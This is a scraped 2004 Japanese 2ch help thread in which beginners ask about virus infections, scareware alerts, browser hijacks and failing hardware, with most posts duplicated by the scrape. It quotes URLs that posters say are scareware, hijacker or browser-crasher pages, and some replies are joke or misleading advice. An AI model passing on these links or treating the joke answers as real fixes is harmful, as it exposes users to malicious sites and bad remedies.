何故ならドライバ新しいの入るからね。
とりあえず、デバイスマネージャからマウス削除して再起動しろ。
何故ならドライバ新しいの入るからね。
とりあえず、デバイスマネージャからマウス削除して再起動しろ。
ウィルススキャンしたら普通にLogファイル拾うだろうな。(w
>>101
エロサイトと誤爆?
エロサイトと誤爆?
>>102
ばれたか。
ばれたか。
104 :ひよこ名無しさん:04/07/14 11:26 ID:D5UfceDq
http://www.smart-security.info/?affid=DNN-1
パソコンつけたらいきなりyou are in dangerという警告があって
その警告に誘導されると上のurlのページにたどり着きました
やばいんでしょうか?
パソコンつけたらいきなりyou are in dangerという警告があって
その警告に誘導されると上のurlのページにたどり着きました
やばいんでしょうか?
>>104
パソコン持って逃げろ。
パソコン持って逃げろ。
>>104
簡単にダマされるんだな。
簡単にダマされるんだな。
107 :ひよこ名無しさん:04/07/14 12:01 ID:M0SZ1qUN
こんにちわ。バイオノートユーザーです。
先週末くらいにメールから
NETSKY.Pのワームに感染してしまいました。
ノートンを購入し削除して安心してたのですが
あまりに重いんでちょっと調べてみたら
Cドライブに「program file」というフォルダがあり、
ものすごい勢いで大きさが増えてます。
また、共有フォルダには「download music」
という不明なフォルダができています。
接続のところには変なネットワークサービスが
3件ほどローカルネットワーク接続している状態です。
下2件は削除できるのですが、「program〜」は
誰かが実行中で削除できません。_vti_〜ってやつです。
当然ウィルススキャンにはひっかからず、ブート扱い?です。
気味が悪いので覚悟を決めて再インストールしたのですが
なくなってくれません。カスタマーサービスにも
昨日から全然電話がつながりません。どうすればよいのでしょうか?
支離滅裂で分かりづらい文章かもしれませんが
宜しくお願いします。
先週末くらいにメールから
NETSKY.Pのワームに感染してしまいました。
ノートンを購入し削除して安心してたのですが
あまりに重いんでちょっと調べてみたら
Cドライブに「program file」というフォルダがあり、
ものすごい勢いで大きさが増えてます。
また、共有フォルダには「download music」
という不明なフォルダができています。
接続のところには変なネットワークサービスが
3件ほどローカルネットワーク接続している状態です。
下2件は削除できるのですが、「program〜」は
誰かが実行中で削除できません。_vti_〜ってやつです。
当然ウィルススキャンにはひっかからず、ブート扱い?です。
気味が悪いので覚悟を決めて再インストールしたのですが
なくなってくれません。カスタマーサービスにも
昨日から全然電話がつながりません。どうすればよいのでしょうか?
支離滅裂で分かりづらい文章かもしれませんが
宜しくお願いします。
>>107
もうネットに接続するな。
もうネットに接続するな。
109 :104:04/07/14 12:28 ID:D5UfceDq
>>109
そういう警告はウソで、ボタンを押すとウイルスが侵入するしかけ。
そういう警告はウソで、ボタンを押すとウイルスが侵入するしかけ。
113 :98:04/07/14 17:21 ID:I4TOl2tX
ディバイスマネージャーというところからマウスを削除して再起動しました
そしてあたらしいディバイス入れるとかなってまた再起動しました
しかし治りませんでした。新しいマウスを買えば治るものなのでしょうか?
どうかよろしくお願いします。あと
ウイルスでは無かったら違うところで質問したほうが
いいでしょうか?
そしてあたらしいディバイス入れるとかなってまた再起動しました
しかし治りませんでした。新しいマウスを買えば治るものなのでしょうか?
どうかよろしくお願いします。あと
ウイルスでは無かったら違うところで質問したほうが
いいでしょうか?
115 :ひよこ名無しさん:04/07/14 17:25 ID:+kMTWCeT
あの、ネットをしてたらウィルスバスターから「ウィルスを発見しました」とメッセージが出ました。
これって感染してしまったのでしょうか?どういう状況なんでしょうか。
教えてください。
これって感染してしまったのでしょうか?どういう状況なんでしょうか。
教えてください。
>115
何のためのバスターだよ。「感染したかも」と思ったらウィルススキャンしなさいよ。
何も情報出さないで聞くより、そのほうが確実だよ。
まー「ウィルス見つけたけど感染は防ぎました」ってことだとは思うけど、念のため。
何のためのバスターだよ。「感染したかも」と思ったらウィルススキャンしなさいよ。
何も情報出さないで聞くより、そのほうが確実だよ。
まー「ウィルス見つけたけど感染は防ぎました」ってことだとは思うけど、念のため。
118 :113:04/07/14 18:10 ID:X7P4GPcy
OSはウインドウズ2000です。
PCは友人の作った自作PCです
マウスはバリューマウス(PS/2)とかいてあります
ドライバというのが付属してたかはわからないです。
これじゃどうしようもないですかね?なんとかお願いします
いまも右クリックしかできないです
PCは友人の作った自作PCです
マウスはバリューマウス(PS/2)とかいてあります
ドライバというのが付属してたかはわからないです。
これじゃどうしようもないですかね?なんとかお願いします
いまも右クリックしかできないです
>>118
取り敢えず、マウスのドライバはプラグアンドプレイで入ったとして、
汎用マウスドライバでも左クリックができないという事は無いだろうから、
マウス自体の故障と考えた方がいいかもしれない。
新しいマウスにすれば、ドライバも付属してくるし、
機械的故障も無いので大丈夫だろう。
安いから買いな。
取り敢えず、マウスのドライバはプラグアンドプレイで入ったとして、
汎用マウスドライバでも左クリックができないという事は無いだろうから、
マウス自体の故障と考えた方がいいかもしれない。
新しいマウスにすれば、ドライバも付属してくるし、
機械的故障も無いので大丈夫だろう。
安いから買いな。
121 :ひよこ名無しさん:04/07/14 18:17 ID:+kMTWCeT
116、117さんありがとう。
スキャンすれば良かったんですね。パニクっててそんなことすら分からなかったです。
一安心しました、ありがとう。
スキャンすれば良かったんですね。パニクっててそんなことすら分からなかったです。
一安心しました、ありがとう。
122 :ひよこ名無しさん:04/07/15 09:03 ID:+zigUuAm
すいません質問です。
PC使用中に急にシャットダウンさせるウィルスってあるのでしょうか?
前触れもなく突然落ちてしまいます。
立ち上げて30分以内に必ずです。
オンラインスキャンしようにも、途中で落ちちゃうのでどうしようも・・
パソはNECのLaVieL XPhomeです。
PC使用中に急にシャットダウンさせるウィルスってあるのでしょうか?
前触れもなく突然落ちてしまいます。
立ち上げて30分以内に必ずです。
オンラインスキャンしようにも、途中で落ちちゃうのでどうしようも・・
パソはNECのLaVieL XPhomeです。
>>124
メーカー製は買ったばかりの状態で20〜30分かかるのは珍しくないぞ。
ちょっと使い込んだだけですぐ30分なんぞオーバーするようになる。
>>122
NECだろ?だったらオンラインスキャンせんでもウイルス駆除ソフトがついてきているだろう?
それをupdateして使ったらどうなんだ?
まずはそれをやってからの話。
やれないならやれない理由を。(アンインストールしたというなら論外w)
メーカー製は買ったばかりの状態で20〜30分かかるのは珍しくないぞ。
ちょっと使い込んだだけですぐ30分なんぞオーバーするようになる。
>>122
NECだろ?だったらオンラインスキャンせんでもウイルス駆除ソフトがついてきているだろう?
それをupdateして使ったらどうなんだ?
まずはそれをやってからの話。
やれないならやれない理由を。(アンインストールしたというなら論外w)
事故レス
>>122
スマンかった。(速くシャットダウンするんだったな)
めんどくさいから、サポセンへどうぞ。
でなければ扇風機の風を当てながら、自前のソフトでウイルススキャンしてみる。
うまくいかなきゃ、こちらへ(特に>>1-10くらいは嫁)
エロサイト見たら…助けてください!Part31
ttp://pc6.2ch.net/test/read.cgi/pcqa/1088914336/
>>122
スマンかった。(速くシャットダウンするんだったな)
めんどくさいから、サポセンへどうぞ。
でなければ扇風機の風を当てながら、自前のソフトでウイルススキャンしてみる。
うまくいかなきゃ、こちらへ(特に>>1-10くらいは嫁)
エロサイト見たら…助けてください!Part31
ttp://pc6.2ch.net/test/read.cgi/pcqa/1088914336/
レスありがとうがざいます。
冷房きかせて、扇風機あてた状態でもすぐ落ちてしまいました。
さきほどノートン先生でチェックしてみた所、ウィルスはなしとでました
(この間にも数回落ちた。。
サポート電話したら、修理だしてと言われたので
そうすることにします。
ありがとうございました。
結果わかりましたら、報告にきたいと思います。
冷房きかせて、扇風機あてた状態でもすぐ落ちてしまいました。
さきほどノートン先生でチェックしてみた所、ウィルスはなしとでました
(この間にも数回落ちた。。
サポート電話したら、修理だしてと言われたので
そうすることにします。
ありがとうございました。
結果わかりましたら、報告にきたいと思います。
CCDファイルをデーモンでマウントしたら、
ノートンがW32.Whiter.Trojanに反応しました。
ファイルにアクセス出来ません、削除できませんのループ後
一個のファイルが感染しています。とでました。
その後フルスキャンしても見つかりません。
再起動してもファイルも消えないしレジストリも見つかりません。
これは感染しているのですか?
ノートンがW32.Whiter.Trojanに反応しました。
ファイルにアクセス出来ません、削除できませんのループ後
一個のファイルが感染しています。とでました。
その後フルスキャンしても見つかりません。
再起動してもファイルも消えないしレジストリも見つかりません。
これは感染しているのですか?
>>128
P2P関係のやつは自分は知ってっても教えんようにしている。
申し訳ないけどダウン板で聞いてくれ。
W32.Whiter.Trojanというウイルスがどういったものか知らないのが、
君の敗因。Whiterかなり極悪です。残念でした。
P2P関係のやつは自分は知ってっても教えんようにしている。
申し訳ないけどダウン板で聞いてくれ。
W32.Whiter.Trojanというウイルスがどういったものか知らないのが、
君の敗因。Whiterかなり極悪です。残念でした。
131 :ひよこ名無しさん:04/07/15 23:30 ID:isbQ3o+7
特に思い当たることはないのですが
ここ数日起動するとノートン・インターネットセキュリティが無効になっています
最新定義のウィルススキャン・ad-awareでも何も検出されません
オプションの起動メニューも「システム起動時に実行する」にチェックが入っています
やっぱりウィルスでしょうか?
ここ数日起動するとノートン・インターネットセキュリティが無効になっています
最新定義のウィルススキャン・ad-awareでも何も検出されません
オプションの起動メニューも「システム起動時に実行する」にチェックが入っています
やっぱりウィルスでしょうか?
忘れてました。バージョンは2002です
マウスが勝手に動き回るんです。
キモイです。ウイルスですか?
助けてママン(;´Д`)
キモイです。ウイルスですか?
助けてママン(;´Д`)
>>133
マウスに足でも生えてきたのか?
マウスに足でも生えてきたのか?
裏蓋を開けたらゴキブリさんが
出てきました。もう大丈夫です。
出てきました。もう大丈夫です。
大昔ゴキタンに人類はひどいめにあったんだろうな
その記憶があるからキャーと悲鳴をあげるんだろな
その記憶があるからキャーと悲鳴をあげるんだろな
137 :ひよこ名無しさん:04/07/16 14:08 ID:bAHu3bus
以前トロイの木馬ウイルスにかかってリカバリしたんですが、リカバリしたらもう
ウイルスの心配は無いんですか?
ウイルスの心配は無いんですか?
138 :ひよこ名無しさん:04/07/16 14:15 ID:iA3OY9oP
すいません、ウィルスを貼りまっくてる馬鹿者が
いるんですけど、運営の人に報告するにはどこの
スレにいけばいいですか?
スレ違いかも知れませんが教えて下さい。
いるんですけど、運営の人に報告するにはどこの
スレにいけばいいですか?
スレ違いかも知れませんが教えて下さい。
>>138
そのページを閉鎖させちまえばOK
そのページを閉鎖させちまえばOK
>>138
運営行ったらいいよ。運用情報板か、削除依頼するなら削除整理板。
運営行ったらいいよ。運用情報板か、削除依頼するなら削除整理板。
まあ報告したとこでアク禁にはならないだろうけどね。程度にもよるが。
削除はしてくれるだろうけど。
削除はしてくれるだろうけど。
レスありがとうございます。
あまりにも悪質なので削除ではなくて、あく禁にして貰いたいのですが
無理なのかな?
あまりにも悪質なので削除ではなくて、あく禁にして貰いたいのですが
無理なのかな?
144 :ひよこ名無しさん:04/07/16 14:37 ID:F71l70WA
申し訳無いですがpc使っていると勝手に
http://www.casinopalazzo.com/index.php?sourceid=100783
のサイトが出てきてショートカットまで作られるのですが
初心者なので直し方がわかりません・・。
教えていただけませんか
http://www.casinopalazzo.com/index.php?sourceid=100783
のサイトが出てきてショートカットまで作られるのですが
初心者なので直し方がわかりません・・。
教えていただけませんか
スレッド削除依頼にだします。どうもでした。
どこで聞いたらいいのか分からなくて「くだらねぇ質問はここに書き込め!ver8.51」
にも書き込んじゃいました。すいません。
どこで聞いたらいいのか分からなくて「くだらねぇ質問はここに書き込め!ver8.51」
にも書き込んじゃいました。すいません。
147 :ひよこ名無しさん:04/07/16 14:43 ID:F71l70WA
>>147
手がかりをもらったらまず自分で検索。
手がかりをもらったらまず自分で検索。
151 :ひよこ名無しさん:04/07/16 14:59 ID:F71l70WA
ありがとうございます。
とりあえず検索してみたのですが英語だらけでなにがなんだか・・。
難しいですね。。
これってお金かかりますか?
とりあえず検索してみたのですが英語だらけでなにがなんだか・・。
難しいですね。。
これってお金かかりますか?
>>151
無料、エロサイト見たらスレの>8に解りやすく書いてあるよ。
無料、エロサイト見たらスレの>8に解りやすく書いてあるよ。
153 :ひよこ名無しさん:04/07/16 15:12 ID:lrGtYAMB
154 :ひよこ名無しさん:04/07/16 15:21 ID:3jgNANHN
つまらない質問で恐縮なんですが、JPGなどのファイルを選択しただけで
ウイルスに感染するということはありえるんでしょうか?ちなみにOSはWIN2Kで
従来のWindowsデスクトップを使用しているので、プレビューはしない状態です。
ウイルスに感染するということはありえるんでしょうか?ちなみにOSはWIN2Kで
従来のWindowsデスクトップを使用しているので、プレビューはしない状態です。
156 :ひよこ名無しさん:04/07/16 15:24 ID:lrGtYAMB
>>156
コピった?
コピった?
>>156
コピった?
コピった?
うん
>>156
通報しておいた
通報しておいた
何で?
ムシャクシャしていたから。
通報するのは何でも良かった。
これからは通報しない。
通報するのは何でも良かった。
これからは通報しない。
163 :ひよこ名無しさん:04/07/16 18:13 ID:iA3OY9oP
反省してるの?
164 :ひよこ名無しさん:04/07/17 03:02 ID:BCxdTdm+
最近PCがおかしなウィンドウが出るようになり、ノートンでスキャンした所
何も検出されなかったので、>>2のウィルスバスターの評価版を試してみようと思い
ダウンロードしてみたら、ノートンをアンインストールしてくださいとでたのですが
これはノートンを完全に削除しないとインストール出来ないということですか?
分からなくなって途中で止めてしまいました。ほんっとにバカな質問ですいません・
何も検出されなかったので、>>2のウィルスバスターの評価版を試してみようと思い
ダウンロードしてみたら、ノートンをアンインストールしてくださいとでたのですが
これはノートンを完全に削除しないとインストール出来ないということですか?
分からなくなって途中で止めてしまいました。ほんっとにバカな質問ですいません・
>>164
ウィルスソフトを同時に複数インストールすると
不具合が生じる事が多い。よってメーカーで他のウィルス
ソフトが入ってたらその手の警告を出すようにしてたりする。
お前の症状はウィルスじゃなくてスパイウェアだな。
エロサイトスレのテンプレやれ。
ウィルスソフトを同時に複数インストールすると
不具合が生じる事が多い。よってメーカーで他のウィルス
ソフトが入ってたらその手の警告を出すようにしてたりする。
お前の症状はウィルスじゃなくてスパイウェアだな。
エロサイトスレのテンプレやれ。
>>165
ウィルスソフトなんてインストールしたら、ウィルスだらけになってしまう。
ウィルスソフトなんてインストールしたら、ウィルスだらけになってしまう。
168 :ひよこ名無しさん:04/07/17 18:32 ID:YxtaOksL
質問です。
前にトロイの木馬に感染してリカバリーしたんですが、
トロイの木馬というのは聞くところによると、こちらのパソコンの情報を
見たり盗んだりできるみたいですが、本当にそういうことをされたのか、心配
です。感染した経験のある方は僕のように心配にならなかったんですか?
それともそういう心配する必要はなくて、心配しすぎですか?
馬鹿な質問ですが教えてください。
前にトロイの木馬に感染してリカバリーしたんですが、
トロイの木馬というのは聞くところによると、こちらのパソコンの情報を
見たり盗んだりできるみたいですが、本当にそういうことをされたのか、心配
です。感染した経験のある方は僕のように心配にならなかったんですか?
それともそういう心配する必要はなくて、心配しすぎですか?
馬鹿な質問ですが教えてください。
分かりました。ありがとうございました。
Unix.Penguinというトロイの木馬式ウイルスが入ってきたようです。
あちこち探したり過去ログ読んだりしたのですが、駆除方法がわかりません。
申し訳ありませんが、どなたか教えてください。
あちこち探したり過去ログ読んだりしたのですが、駆除方法がわかりません。
申し訳ありませんが、どなたか教えてください。
174 :ひよこ名無しさん:04/07/18 01:34 ID:8ZenGQWK
すいません。win98です。
トレンドマイクロのオンラインスキャンで
「TROJ_DYFUCA.M」というトロイの木馬型ウイルスが三つ検出されたので、
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DYFUCA.M
ここ↑を参考にして、まず普通に削除しようとしました。
一つはそのまま削除できたんですが、あと二つは
「指定されたファイルはWindowsが使用しています」と出て削除できません。
そこで↑のサイトで見たとおりWindowsSafeモードで削除しようとしたんですが、
やはり同じメッセージが出て削除できません。
次に、駆除もできる、と聞いたPanda ActiveScanを使ってウイルスを検索してみたんですが、
なぜか今度はウイルス自体が検出されませんでした。
自動削除でもされたのかと思ってふたたびトレンドマイクロのものを試してみると、
やっぱり二つ検出されます。
どうしたらこの二つのファイルを削除できるんでしょうか?
Windowsフォルダの中にあるんですが…。
トレンドマイクロのオンラインスキャンで
「TROJ_DYFUCA.M」というトロイの木馬型ウイルスが三つ検出されたので、
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DYFUCA.M
ここ↑を参考にして、まず普通に削除しようとしました。
一つはそのまま削除できたんですが、あと二つは
「指定されたファイルはWindowsが使用しています」と出て削除できません。
そこで↑のサイトで見たとおりWindowsSafeモードで削除しようとしたんですが、
やはり同じメッセージが出て削除できません。
次に、駆除もできる、と聞いたPanda ActiveScanを使ってウイルスを検索してみたんですが、
なぜか今度はウイルス自体が検出されませんでした。
自動削除でもされたのかと思ってふたたびトレンドマイクロのものを試してみると、
やっぱり二つ検出されます。
どうしたらこの二つのファイルを削除できるんでしょうか?
Windowsフォルダの中にあるんですが…。
>>174
WinfileからBANすりゃいいじゃん。
WinfileからBANすりゃいいじゃん。
176 :174:04/07/18 01:45 ID:8ZenGQWK
178 :174=176:04/07/18 01:53 ID:8ZenGQWK
>>178
セーフモードで使用中になるのなら、MS-DOSモードで起動しなくちゃ消せまい。
セーフモードで使用中になるのなら、MS-DOSモードで起動しなくちゃ消せまい。
180 :174=176=178:04/07/18 02:21 ID:8ZenGQWK
>>177
本当にありがとうございました。
スタートメニューからWinfileを起動して、Windowsを選択して、
感染したファイルを削除することができました。
念のためにトレンドマイクロのオンラインスキャンで検索してみましたが、
ウイルスは検出されませんでした。
寝る前に「ウイルス感染したファイルが消せなくて困った時はWinfileを起動して消す」
とノートにでも書いておくことにします。
>>179
レスありがとうございます。
幸い上記のような方法で消すことができました。
本当にありがとうございました。
スタートメニューからWinfileを起動して、Windowsを選択して、
感染したファイルを削除することができました。
念のためにトレンドマイクロのオンラインスキャンで検索してみましたが、
ウイルスは検出されませんでした。
寝る前に「ウイルス感染したファイルが消せなくて困った時はWinfileを起動して消す」
とノートにでも書いておくことにします。
>>179
レスありがとうございます。
幸い上記のような方法で消すことができました。
Meで_restoreフォルダ消せるかどうか、Winfileでやってみよう。
182 :ひよこ名無しさん:04/07/18 02:43 ID:kWINApNM
今パソコンを起動したらウイルスに感染しているとでました。ウイルスバスターでも処理、隔離できなかったようです
それでインターネットを起動しようとするとこんな画面が出てきたのですhttp://monositu.org/imagebord/img/Monositu_20040718022936-158.JPG
(この画面は何故か勝手にトップページに指定されます。プロパティで元に戻してもまたこれに勝手に設定されます)
きっと感染したウイルスのせいだと思い、このウイルスの駆除方法を調べてみました。
が、感染したファイル名を知る必要があるようですが、なぜか感染報告にも感染したファイル名が表示されないのです。
しかも(多分このウイルスのせいだと思いますが)フォルダを開くと四角で囲んだ点しか表示されないのです。
どうしたらよいでしょうか?
これはその画像です。http://monositu.org/imagebord/img/Monositu_20040718023002-161.JPG
http://monositu.org/imagebord/img/Monositu_20040718023031-107.JPG
それでインターネットを起動しようとするとこんな画面が出てきたのですhttp://monositu.org/imagebord/img/Monositu_20040718022936-158.JPG
(この画面は何故か勝手にトップページに指定されます。プロパティで元に戻してもまたこれに勝手に設定されます)
きっと感染したウイルスのせいだと思い、このウイルスの駆除方法を調べてみました。
が、感染したファイル名を知る必要があるようですが、なぜか感染報告にも感染したファイル名が表示されないのです。
しかも(多分このウイルスのせいだと思いますが)フォルダを開くと四角で囲んだ点しか表示されないのです。
どうしたらよいでしょうか?
これはその画像です。http://monositu.org/imagebord/img/Monositu_20040718023002-161.JPG
http://monositu.org/imagebord/img/Monositu_20040718023031-107.JPG
>>182
窓の手使え。
窓の手使え。
MeのWinfileには、_restoreフォルダが表示されませんでした。
表示しない仕様のようです。仕方がないので消せそうもないExplorer.exeを削除しようとした所、
やっぱり使用中で消せませんでした。
表示しない仕様のようです。仕方がないので消せそうもないExplorer.exeを削除しようとした所、
やっぱり使用中で消せませんでした。
>>182
あるじゃん。まぁ、スパイウェアなんだが。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A
あるじゃん。まぁ、スパイウェアなんだが。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A
186 :182:04/07/18 02:54 ID:kWINApNM
>>183
これは直すことができるんですよね?
本当にすみません。窓の手というのはどういうことでしょうか?
>>185
そこのページを見て駆除方法試みようとしたのですが感染したファイル名がわからないのです。どうしたらよいでしょうか?
これは直すことができるんですよね?
本当にすみません。窓の手というのはどういうことでしょうか?
>>185
そこのページを見て駆除方法試みようとしたのですが感染したファイル名がわからないのです。どうしたらよいでしょうか?
>>186
ウィルススキャンしてパスを書きしたためればいいじゃん?
ウィルススキャンしてパスを書きしたためればいいじゃん?
188 :ひよこ名無しさん:04/07/18 03:00 ID:kWINApNM
>>187
それがスキャンすると何故か感染は0になっているんです
ですがスキャン途中に
http://monositu.org/imagebord/img/Monositu_20040718023031-107.JPG
この画面が出てくるんです
それがスキャンすると何故か感染は0になっているんです
ですがスキャン途中に
http://monositu.org/imagebord/img/Monositu_20040718023031-107.JPG
この画面が出てくるんです
>>188
とりあえず、エロサイトスレのテンプレを全部やる事だな。全部ね。
とりあえず、エロサイトスレのテンプレを全部やる事だな。全部ね。
190 :ひよこ名無しさん:04/07/18 03:09 ID:kWINApNM
>>189
エロサイトスレ?ってのはなんですか?
このスレのテンプレを全部やれってことですか?そうすれば直りますか?
ところで話は変わりますが
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A に
この不正プログラムは、リモートユーザーにSMTPメールを使い攻撃対象のコンピュータの情報を送信します。
ハッカーは、インターネット上のチャットシステムであるIRCのアプリケーションを使用して攻撃対象のWindowsをコントロールすることが可能です。またこの不正プログラムにより攻撃対象のコンピュータは、他のコンピュータにDDoS攻撃をする場合もあります。
と書いてありましたが、これは僕のパソコンが自由に操られ、自由勝手なことをされるということですか?
エロサイトスレ?ってのはなんですか?
このスレのテンプレを全部やれってことですか?そうすれば直りますか?
ところで話は変わりますが
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A に
この不正プログラムは、リモートユーザーにSMTPメールを使い攻撃対象のコンピュータの情報を送信します。
ハッカーは、インターネット上のチャットシステムであるIRCのアプリケーションを使用して攻撃対象のWindowsをコントロールすることが可能です。またこの不正プログラムにより攻撃対象のコンピュータは、他のコンピュータにDDoS攻撃をする場合もあります。
と書いてありましたが、これは僕のパソコンが自由に操られ、自由勝手なことをされるということですか?
>>186
「窓の手使え」というのはネタ回答。
どこ見てんだ? ファイル名ちゃんと書いてあるだろうが。
> この不正プログラムは、<Windowsフォルダ>内に"COMCFG.EXE"と"SYSTEM.EXE"
> というファイル名で自身のコピーを作成します。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A&VSect=T
このファイルを探して削除。レジストリの改変を修復。とにかくトレンドの対策ページ
よく読め。
「窓の手使え」というのはネタ回答。
どこ見てんだ? ファイル名ちゃんと書いてあるだろうが。
> この不正プログラムは、<Windowsフォルダ>内に"COMCFG.EXE"と"SYSTEM.EXE"
> というファイル名で自身のコピーを作成します。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A&VSect=T
このファイルを探して削除。レジストリの改変を修復。とにかくトレンドの対策ページ
よく読め。
192 :ひよこ名無しさん:04/07/18 03:14 ID:kWINApNM
>>191
わかりました。とりあえずまずCOMCFG.EXE"と"SYSTEM.EXEを削除すればいいわけですね?
レジストリの改変を修復したいんですけど改変される前のレジストリ値がわからないんです。どうしたらよいでしょうか
わかりました。とりあえずまずCOMCFG.EXE"と"SYSTEM.EXEを削除すればいいわけですね?
レジストリの改変を修復したいんですけど改変される前のレジストリ値がわからないんです。どうしたらよいでしょうか
やっぱ、全然読んでないだけじゃん。
本気で治したいのかね。何様のつもりで俺らに読ませてるんだろう。
本気で治したいのかね。何様のつもりで俺らに読ませてるんだろう。
>>192
PCを修理業者に出したらまずは国語の勉強からだな・・・
PCを修理業者に出したらまずは国語の勉強からだな・・・
195 :ひよこ名無しさん:04/07/18 09:55 ID:8BOu+AZV
196 :ひよこ名無しさん:04/07/18 17:56 ID:zsLZE6oz
http://ime.nu/ime.nu/sakashita.strangeworld.org/source/up0768.jpg
これをクリックしてしまいました。
後で気付いたら、下記の指摘のレスが付いていました。
対象 URL
http://sakashita.strangeworld.org/source/up0768.jpg
--------------------------------------------------------------------------------
mailto ストーム
アンカータグではないタグで mailto: の記述が見つかりました。
メール作成ウィンドウがたぁっくさん出てきてしまうかもしれません。
パワーのないマシンでは,ブラウザがフリーズする可能性があります。
--------------------------------------------------------------------------------
FDD アタック / concon クラッシャー等 [img タグ等]
IMG タグや JavaScript 等により file スキーマを参照します。
ブラウザの設定によってはフロッピーディスクドライブに不要な
アクセスが続いたり, OS がクラッシュする可能性があります。
_________________________
でも、クリックしてから接続がつながらなかったみたいだったので、
画面右上の×をクリックしました。上記のウイルス影響の指摘文の症状とか、
困った症状は起きていなくていつも通りなんですが、これはセーフだったという
ことでしょうか?どなたか教えてください。
これをクリックしてしまいました。
後で気付いたら、下記の指摘のレスが付いていました。
対象 URL
http://sakashita.strangeworld.org/source/up0768.jpg
--------------------------------------------------------------------------------
mailto ストーム
アンカータグではないタグで mailto: の記述が見つかりました。
メール作成ウィンドウがたぁっくさん出てきてしまうかもしれません。
パワーのないマシンでは,ブラウザがフリーズする可能性があります。
--------------------------------------------------------------------------------
FDD アタック / concon クラッシャー等 [img タグ等]
IMG タグや JavaScript 等により file スキーマを参照します。
ブラウザの設定によってはフロッピーディスクドライブに不要な
アクセスが続いたり, OS がクラッシュする可能性があります。
_________________________
でも、クリックしてから接続がつながらなかったみたいだったので、
画面右上の×をクリックしました。上記のウイルス影響の指摘文の症状とか、
困った症状は起きていなくていつも通りなんですが、これはセーフだったという
ことでしょうか?どなたか教えてください。
>>196
セーフでした。よかったね。
セーフでした。よかったね。
>>196
strangeworld.orgはNGワードにするのが2ちゃんの常識
strangeworld.orgはNGワードにするのが2ちゃんの常識
セーフですか、よかった。ありがとうございました。
ノートンの2004年バージョンを使っているのですが
更新リストを取り込めずLiveUpdateができません
ここをクリックするとエラーについての詳しい情報を表示します
というところをクリックしても、ページを表示できませんという画面になります
どうしたらいいでしょう?
更新リストを取り込めずLiveUpdateができません
ここをクリックするとエラーについての詳しい情報を表示します
というところをクリックしても、ページを表示できませんという画面になります
どうしたらいいでしょう?
>>200
ネットにつながってないんじゃないか?
ネットにつながってないんじゃないか?
203 :ひよこ名無しさん:04/07/19 14:28 ID:1eRQfy5S
毎日、送ってもいないメールアドレスからエラーメールが返ってきます。
そのメールアドレスは毎回ちがうアドレスなのですが、
自分がよく行くサイトに記載されているメアドから送られてくるようです。
もしかしてウィルスに感染した?((( ;゚Д゚)))ガクガクブルブル
そのメールアドレスは毎回ちがうアドレスなのですが、
自分がよく行くサイトに記載されているメアドから送られてくるようです。
もしかしてウィルスに感染した?((( ;゚Д゚)))ガクガクブルブル
>>203
なんでウィルススキャンしないの?
なんでウィルススキャンしないの?
205 :ひよこ名無しさん:04/07/19 15:13 ID:1eRQfy5S
child.dllってのが感染してたよ
>>205
炉利野郎
炉利野郎
208 :205:04/07/19 16:06 ID:1eRQfy5S
どうやら虫熊のようだな
209 :205:04/07/19 17:00 ID:1eRQfy5S
child.dllが起動中で削除できないんだけどどうすれば終了させられる?
>>209
Ctrl+Alt+Del
Ctrl+Alt+Del
211 :205:04/07/19 17:13 ID:1eRQfy5S
>>210
Explorer以外全部終了させても消えない
Explorer以外全部終了させても消えない
212 :にやこう ◆Es3JBt9s5c :04/07/19 17:15 ID:???
>>211
(・∀・)ニヤニヤ
(・∀・)ニヤニヤ
>>211
わからんかったら、Fixして再起動しろよ。
わからんかったら、Fixして再起動しろよ。
215 :205:04/07/19 17:26 ID:1eRQfy5S
>>213
できた。ありがd
できた。ありがd
216 :ひよこ名無しさん:04/07/19 18:15 ID:lg52NoxV
Windows XP Home Editionで
OpenJaneから2ch見てるんだけど、毒男板開くと毎回
「Unix. Penguin」っつーウィルスを削除しました、っていう
警告が出る。駆除ソフトはノートン先生使ってる。
これはどういうことでしょか
OpenJaneから2ch見てるんだけど、毒男板開くと毎回
「Unix. Penguin」っつーウィルスを削除しました、っていう
警告が出る。駆除ソフトはノートン先生使ってる。
これはどういうことでしょか
218 :216:04/07/19 18:19 ID:lg52NoxV
便乗。Win板では「Subject.txt」がUnix.penguinに感染しとるとノートンセンセは言ってますが。
これは一体?
これは一体?
221 :ひよこ名無しさん:04/07/19 18:33 ID:gqdfr4Gs
【三十路】30歳以上でもアルバイトしてる人集まれ〜
http://school4.2ch.net/test/read.cgi/part/1089525967/l50
だれか助けてください、ここ見たらウイルスに取りつかれました。
どうやってないおしたらいいかわかりません。。
http://school4.2ch.net/test/read.cgi/part/1089525967/l50
だれか助けてください、ここ見たらウイルスに取りつかれました。
どうやってないおしたらいいかわかりません。。
223 :221:04/07/19 18:40 ID:gqdfr4Gs
そこを見たらっていうか、そこに張ってあったURLクリックしたら変になったんだけど、、
>>217見てもわけわかんないよぉ。
>>217見てもわけわかんないよぉ。
( ´_ゝ`)フーン
>>223
217にも貼ってあるから。
217にも貼ってあるから。
WindowsXP
Norton AntiVirus2003
Internet Explorer6
Backdoor.Trojanというウイルスに感染したようです。
ノートンが勝手にウイルス警告ダイアログを出します。
オブジェクト名:C:\WINDOWS\System32\ms.dll
適用した処理:ファイルを修復できません。
と出ます。
そのファイルを消そうとしますが、そのファイルは存在しないようです。
(すべてのファイルを表示にしています)
公式サイトも見ましたが、うまくいきません。
どうやったら除去できますか?
http://up.nm78.com/data/up047078.gif
こんなのが出ます。
・トレンドマイクロ/オンラインスキャン
ではウイルスは発見されませんでした。
・ad-aware も入れてやりましたが、ダメでした。
・ノートンを完全スキャンしてもウイルスは発見されません
Norton AntiVirus2003
Internet Explorer6
Backdoor.Trojanというウイルスに感染したようです。
ノートンが勝手にウイルス警告ダイアログを出します。
オブジェクト名:C:\WINDOWS\System32\ms.dll
適用した処理:ファイルを修復できません。
と出ます。
